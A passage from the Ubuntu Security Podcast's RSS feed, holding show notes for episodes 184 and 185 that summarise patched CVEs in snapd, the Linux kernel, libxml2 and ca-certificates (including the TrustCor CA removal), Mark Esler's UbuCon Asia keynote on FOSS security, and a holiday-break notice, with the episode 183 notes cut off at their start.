<p>Strive to write a dessert recipe that is so perfect, that it doesn&rsquo;t matter if
someone tries to tamper with it once it is completed, your dessert will come out
delicious every time! Yeah, I see you prankster cousin, trying to turn on the
heat to get my trifle to melt. It won&rsquo;t though because I added gelatine to
it&hellip;or whatever ingredient is needed to not have cream melt&hellip;I&rsquo;m not a cooking
expert&hellip;my family and friends definitely know that. Anyway, of course there are
problems that you might still come across even when cooking or coding with
deliciousness and security in mind. Because there is no dessert that can be
saved by you using 3kg of salt instead of 3g of salt on what is supposed to be
something sweet, because there is an accidental extra &lsquo;k&rsquo; in your recipe&hellip;but
you get the point, and open source gets the point! Because if your dessert
recipe is an open recipe and someone finds this &ldquo;accidental&rdquo; 3kgs-of-salt
mistake - which happens, we are all human and we make mistakes - they can tell
you about it and you can fix it! So buy a recipe notebook that can be left
outside and no one can write on it unless they use the special notebook pen
which you own the rights to, sign your instructions so that you know which ones
are trustworthy, and fix the mistakes you find along the way when people that
want to share this amazing thing with you give you a nudge about it. You will
then know that you are doing your best to provide people with the best holiday
dessert ever, so that everyone can enjoy it together during this special holiday
time! Also&hellip;you know&hellip;secure open source code during the holidays as well!</p>
<p>Well, dearest friends and family, that is all of the holiday spirit I have to
share with you today! I wish you all an amazing holiday season, filled with
love, joy, open source and lots and lots of security patches! Feel free to share
your thoughts about this podcast segment and the topic related to it in any of
our social media channels! I hope you enjoyed it, and for now, I bid you all
farewell, and until next time! Bye!</p>
<p>Credit to <a href="https://www.fesliyanstudios.com">https://www.fesliyanstudios.com</a> for the background music.</p>
<h3 id="ubuntu-security-team-and-podcast-on-holiday-break-34-37">Ubuntu Security team and podcast on holiday break [34:37]</h3>
<ul>
<li>Almost all of Canonical is on leave for 2 weeks</li>
<li>Various security team members will be in and out over the break - some taking more leave after that</li>
<li>Podcast will also take a break for a few weeks - likely return in late January</li>
<li>Hope to look at some changes / perhaps a more permanent co-host and other changes in 2023</li>
<li>Wishing all our listeners a safe and enjoyable holiday season</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E185.mp3" length="35827699" type="audio/mpeg" /><itunes:duration>2195</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 184
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-184/</link>
          <pubDate>Fri, 09 Dec 2022 16:24:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>66d025853830562e95dcc1d4a9442b76202bda3bd025aacfa071f2ff02ac061a416d7ffe17c8859e42c197289455ea8e63f5032c01aea402efb3541c507f0caa</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 184</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we cover Mark Esler's keynote address from UbuCon Asia 2022 on
  Improving FOSS Security, plus we look at security vulnerabilities and updates
  for snapd, the Linux kernel, ca-certificates and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we cover Mark Esler's keynote address from UbuCon Asia 2022 on
  Improving FOSS Security, plus we look at security vulnerabilities and updates
  for snapd, the Linux kernel, ca-certificates and more.
  </itunes:summary>
        <description>  This week we cover Mark Esler's keynote address from UbuCon Asia 2022 on
  Improving FOSS Security, plus we look at security vulnerabilities and updates
  for snapd, the Linux kernel, ca-certificates and more.
  </description>
        <googleplay:description>  This week we cover Mark Esler's keynote address from UbuCon Asia 2022 on
  Improving FOSS Security, plus we look at security vulnerabilities and updates
  for snapd, the Linux kernel, ca-certificates and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we cover Mark Esler&rsquo;s keynote address from UbuCon Asia 2022 on
Improving FOSS Security, plus we look at security vulnerabilities and updates
for snapd, the Linux kernel, ca-certificates and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>42 unique CVEs addressed</p>
<h3 id="usn-5753-1-snapd-vulnerability-01-08">[<a href="https://ubuntu.com/security/notices/USN-5753-1">USN-5753-1</a>] snapd vulnerability [01:08]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3328">CVE-2022-3328</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Follow-up to the last snapd vulnerability (see <a href="/episode-149/#oh-snap-more-lemmings--local-privilege-escalation-in-snap-confine--09-01">Oh Snap! More Lemmings (Local Privilege Escalation in snap-confine) from Episode 149</a>)</li>
<li><a href="https://blog.qualys.com/vulnerabilities-threat-research/2022/11/30/race-condition-in-snap-confines-must_mkdir_and_open_with_perms-cve-2022-3328">https://blog.qualys.com/vulnerabilities-threat-research/2022/11/30/race-condition-in-snap-confines-must_mkdir_and_open_with_perms-cve-2022-3328</a></li>
<li>A slightly simplified explanation is as follows</li>
<li>Part of that vulnerability was that snap-confine creates a private tmp for
each snap - and this is created under the system&rsquo;s real <code>/tmp</code> so that its disk
usage etc gets accounted for as part of the normal <code>/tmp</code></li>
<li>But <code>/tmp</code> is world writable so it is trivial for a user to create the expected
per-snap directory and place their own contents inside that such that they can
have this be executed by <code>snap-confine</code> during the process of creating this
private <code>/tmp</code> namespace for the snap - and hence get privilege escalation to root as <code>snap-confine</code> is suid</li>
<li>the original fix then relied on checking if this path was appropriately owned
by root etc - and if not, it would create a new random directory then move the
imposter out of the way and replace it with the one it just created via <code>rename()</code></li>
<li>But this is not atomic so could be raced - and even though the fix included
additional checks to try and catch any failed race, Qualys found a way to win
this race and avoid those checks</li>
<li>New fix is to use <code>systemd-tmpfiles</code> to create a <code>/tmp/snap-private-tmp/</code>
directory on boot with the appropriate restrictive permissions</li>
<li>Then <code>snap-confine</code> can create the per-snap private <code>/tmp</code> within this without
fear of being interfered with by unprivileged users</li>
<li>Thanks to Qualys for their help in reporting this and reviewing patches etc</li>
</ul>
<h3 id="usn-5743-2-libtiff-vulnerability-05-10">[<a href="https://ubuntu.com/security/notices/USN-5743-2">USN-5743-2</a>] LibTIFF vulnerability [05:10]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3970">CVE-2022-3970</a> <!-- raw HTML omitted --></li>
<li><a href="/episode-183/#usn-5743-1-libtiff-vulnerability">[USN-5743-1] LibTIFF vulnerability from Episode 183</a></li>
</ul>
</li>
</ul>
<h3 id="usn-5752-1-linux-kernel--azure-cvm--vulnerabilities-05-20">[<a href="https://ubuntu.com/security/notices/USN-5752-1">USN-5752-1</a>] Linux kernel (Azure CVM) vulnerabilities [05:20]</h3>
<ul>
<li>6 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-42722">CVE-2022-42722</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42721">CVE-2022-42721</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42720">CVE-2022-42720</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42719">CVE-2022-42719</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41674">CVE-2022-41674</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2602">CVE-2022-2602</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 azure fde 22.04 LTS</li>
<li>Race condition in <code>io_uring</code> -&gt; UAF (from Pwn2Own 2022)
<ul>
<li><a href="/episode-182/#lsn-0090-1-linux-kernel-vulnerability-01-16">[LSN-0090-1] Linux kernel vulnerability from Episode 182</a></li>
</ul>
</li>
</ul>
<h3 id="usn-5754-1-linux-kernel-vulnerabilities-05-50">[<a href="https://ubuntu.com/security/notices/USN-5754-1">USN-5754-1</a>] Linux kernel vulnerabilities [05:50]</h3>
<ul>
<li>8 CVEs addressed in Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3621">CVE-2022-3621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3594">CVE-2022-3594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3567">CVE-2022-3567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3566">CVE-2022-3566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3565">CVE-2022-3565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3564">CVE-2022-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3524">CVE-2022-3524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.19 generic/aws/gcp/ibm/kvm/oracle/raspi/lowlatency</li>
<li>Buffer overflow in NFSD in kernel affecting only very recent kernel versions
(5.19.17 to 6.0.2)
<ul>
<li>would allow a remote client to trigger this stack buffer overflow and
potentially get code execution within the kernel</li>
</ul>
</li>
</ul>
<h3 id="usn-5755-1-linux-kernel-vulnerabilities-06-18">[<a href="https://ubuntu.com/security/notices/USN-5755-1">USN-5755-1</a>] Linux kernel vulnerabilities [06:18]</h3>
<ul>
<li>9 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3621">CVE-2022-3621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3594">CVE-2022-3594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3567">CVE-2022-3567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3566">CVE-2022-3566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3565">CVE-2022-3565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3564">CVE-2022-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3524">CVE-2022-3524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42703">CVE-2022-42703</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 generic/aws/gcp/ibm/kvm/oracle/raspi/lowlatency (22.04 LTS + 20.04 LTS
for specific HWE variants)</li>
<li>NFSD buffer overflow</li>
<li>anonymous VMA mapping issue discussed briefly last week
<ul>
<li>GPZ put out a very detailed blog post about how the PoC works for this</li>
<li><a href="https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html">https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html</a></li>
</ul>
</li>
</ul>
<h3 id="usn-5756-1-linux-kernel-vulnerabilities-06-55">[<a href="https://ubuntu.com/security/notices/USN-5756-1">USN-5756-1</a>] Linux kernel vulnerabilities [06:55]</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3621">CVE-2022-3621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3594">CVE-2022-3594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3567">CVE-2022-3567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3566">CVE-2022-3566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3565">CVE-2022-3565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3564">CVE-2022-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3524">CVE-2022-3524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42703">CVE-2022-42703</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5757-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5757-1">USN-5757-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3621">CVE-2022-3621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3594">CVE-2022-3594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3567">CVE-2022-3567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3566">CVE-2022-3566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3565">CVE-2022-3565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3564">CVE-2022-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3524">CVE-2022-3524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3239">CVE-2022-3239</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42703">CVE-2022-42703</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5757-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5757-2">USN-5757-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3621">CVE-2022-3621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3594">CVE-2022-3594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3567">CVE-2022-3567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3566">CVE-2022-3566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3565">CVE-2022-3565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3564">CVE-2022-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3524">CVE-2022-3524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3239">CVE-2022-3239</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42703">CVE-2022-42703</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5758-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5758-1">USN-5758-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>13 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40768">CVE-2022-40768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3635">CVE-2022-3635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3621">CVE-2022-3621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3594">CVE-2022-3594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3567">CVE-2022-3567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3566">CVE-2022-3566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3565">CVE-2022-3565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3564">CVE-2022-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3524">CVE-2022-3524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3239">CVE-2022-3239</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42703">CVE-2022-42703</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5756-2-linux-kernel--gke--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5756-2">USN-5756-2</a>] Linux kernel (GKE) vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3621">CVE-2022-3621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3594">CVE-2022-3594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3567">CVE-2022-3567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3566">CVE-2022-3566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3565">CVE-2022-3565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3564">CVE-2022-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3524">CVE-2022-3524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42703">CVE-2022-42703</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5755-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5755-2">USN-5755-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3621">CVE-2022-3621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3594">CVE-2022-3594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3567">CVE-2022-3567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3566">CVE-2022-3566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3565">CVE-2022-3565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3564">CVE-2022-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3524">CVE-2022-3524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42703">CVE-2022-42703</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5759-1-libbpf-vulnerabilities-07-06">[<a href="https://ubuntu.com/security/notices/USN-5759-1">USN-5759-1</a>] LibBPF vulnerabilities [07:06]</h3>
<ul>
<li>5 CVEs addressed in Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3606">CVE-2022-3606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3534">CVE-2022-3534</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3533">CVE-2022-3533</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45941">CVE-2021-45941</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45940">CVE-2021-45940</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different heap-based buffer overflows, 1 memory leak, 1 UAF and 1 NULL
pointer deref</li>
</ul>
<h3 id="usn-5760-1-usn-5760-2-libxml2-vulnerabilities-07-19">[<a href="https://ubuntu.com/security/notices/USN-5760-1">USN-5760-1</a>, <a href="https://ubuntu.com/security/notices/USN-5760-2">USN-5760-2</a>] libxml2 vulnerabilities [07:19]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-40304">CVE-2022-40304</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40303">CVE-2022-40303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2309">CVE-2022-2309</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM) (first two above)</li>
<li>NULL ptr deref, double-free, OOB read due to an integer overflow when parsing
multigigabyte XML files</li>
</ul>
<h3 id="usn-5761-1-usn-5761-2-ca-certificates-update-07-37">[<a href="https://ubuntu.com/security/notices/USN-5761-1">USN-5761-1</a>, <a href="https://ubuntu.com/security/notices/USN-5761-2">USN-5761-2</a>] ca-certificates update [07:37]</h3>
<ul>
<li>Affecting Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)</li>
<li>Removal of the TrustCor CA cert - upstream Mozilla have marked this as
distrusted after 30th November - ie don&rsquo;t trust anything signed by this CA
after that date - but there is no such functionality in <code>ca-certificates</code> to
mark something as distrusted after a particular date - so instead we have
removed it entirely so all things signed by TrustCor would now not be trusted</li>
<li>TrustCor appear to have very close ties (ie potentially the same owners) with
other companies who have built spyware and surveillance technologies</li>
<li><a href="https://www.washingtonpost.com/technology/2022/11/30/trustcor-internet-authority-mozilla/">https://www.washingtonpost.com/technology/2022/11/30/trustcor-internet-authority-mozilla/</a></li>
<li>Looking at certificate transparency logs, appears to only be a few downstream
sites that would now be distrusted as a result - in particular a bunch of
dynamic DNS provider noip.com</li>
<li>Thanks to JanC in <code>#ubuntu-security</code> for discussing this with the team</li>
</ul>
<h3 id="usn-5762-1-gnu-binutils-vulnerability-09-51">[<a href="https://ubuntu.com/security/notices/USN-5762-1">USN-5762-1</a>] GNU binutils vulnerability [09:51]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-38533">CVE-2022-38533</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5764-1-u-boot-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5764-1">USN-5764-1</a>] U-Boot vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-34835">CVE-2022-34835</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33967">CVE-2022-33967</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33103">CVE-2022-33103</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30767">CVE-2022-30767</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30790">CVE-2022-30790</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30552">CVE-2022-30552</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2347">CVE-2022-2347</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5763-1-numpy-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5763-1">USN-5763-1</a>] NumPy vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-41496">CVE-2021-41496</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41495">CVE-2021-41495</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34141">CVE-2021-34141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33430">CVE-2021-33430</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="mark-esler-at-ubucon-asia-2022-10-00">Mark Esler at UbuCon Asia 2022 [10:00]</h3>
<ul>
<li>UbuCon Asia 2022 is conference held in Asia focussing on Ubuntu, Linux and
F/OSS in general</li>
<li>First one was held last year as a fully virtual conference</li>
<li>This year was in person in Seoul, South Korea</li>
<li>Mark Esler from the Ubuntu Security team delivered the keynote address about
how Canonical does security maintenance for Ubuntu as well as advice for how
F/OSS projects can better handle security vulnerabilities and coordinate with
downstreams like Ubuntu to help keep all users of their software safe</li>
<li>Covers things like how we maintain stable versions of each package in a given
release and then backport fixes on top, how we handle any potential
regressions, how CVEs are (unfortunately) a normal part of software and some
common examples of different CVEs</li>
<li>How we handle disclosure of vulnerabilities</li>
<li>The process of how we do security updates in Ubuntu (patching, testing, releasing etc)</li>
<li>And then how upstream F/OSS projects can better handle security issues and
work with the security community</li>
<li><a href="https://2022.ubucon.asia/sessions/keynote/">https://2022.ubucon.asia/sessions/keynote/</a></li>
<li><a href="https://docs.google.com/presentation/d/1WkdlbJ2JZgYiKUU_Hn6u1mjhmMiobXnBgrw9yJN3DTc/edit">Slides including speaker notes</a></li>
<li>Video of the session is at <a href="https://youtu.be/N5nVSXV9Hbk?t=480">https://youtu.be/N5nVSXV9Hbk?t=480</a> - Mark&rsquo;s
presentation begins right at about 8 minutes in</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E184.mp3" length="14363412" type="audio/mpeg" /><itunes:duration>787</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 183
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-183/</link>
          <pubDate>Fri, 02 Dec 2022 17:48:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>a06e9819a73f35852cc208f51663d63d35295c3b7d0d6c1e429527c7b14d944e694b2daf9b7c680903915483cba822a2ea91098679e570c4b88c789aa76cfd71</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 183</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at a recent report from Elastic Security Labs on the global
  Linux threat landscape, plus we look at a few of the security vulnerabilities
  patched by the team in the past 7 days.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at a recent report from Elastic Security Labs on the global
  Linux threat landscape, plus we look at a few of the security vulnerabilities
  patched by the team in the past 7 days.
  </itunes:summary>
        <description>  This week we look at a recent report from Elastic Security Labs on the global
  Linux threat landscape, plus we look at a few of the security vulnerabilities
  patched by the team in the past 7 days.
  </description>
        <googleplay:description>  This week we look at a recent report from Elastic Security Labs on the global
  Linux threat landscape, plus we look at a few of the security vulnerabilities
  patched by the team in the past 7 days.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at a recent report from Elastic Security Labs on the global
Linux threat landscape, plus we look at a few of the security vulnerabilities
patched by the team in the past 7 days.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>81 unique CVEs addressed</p>
<h3 id="usn-5638-3-expat-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5638-3">USN-5638-3</a>] Expat vulnerability</h3>
<ul>
